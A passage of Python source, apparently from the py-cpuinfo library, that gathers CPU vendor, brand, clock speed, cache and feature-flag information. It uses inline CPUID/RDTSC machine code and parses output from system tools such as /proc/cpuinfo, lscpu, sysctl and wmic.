#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
cache_info = {
'size_kb' : ecx & 0xFF,
'line_size_b' : (ecx >> 12) & 0xF,
'associativity' : (ecx >> 16) & 0xFFFF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return an empty result if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Return an empty result if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Measure the actual Hz from the time stamp counter over one second
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the advertised Hz and scale from the processor brand string
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
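# Hedged illustration (not part of py-cpuinfo): the unit suffix decides the
# scale handed to to_friendly_hz/to_raw_hz, 6 for MHz and 9 for GHz, exactly
# as _get_cpu_info_from_cpufreq_info does above.
def _example_scale_for_suffix(hz_text):
    hz_text = hz_text.strip().lower()
    if hz_text.endswith('mhz'):
        return 6
    if hz_text.endswith('ghz'):
        return 9
    return 1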
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcdef')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
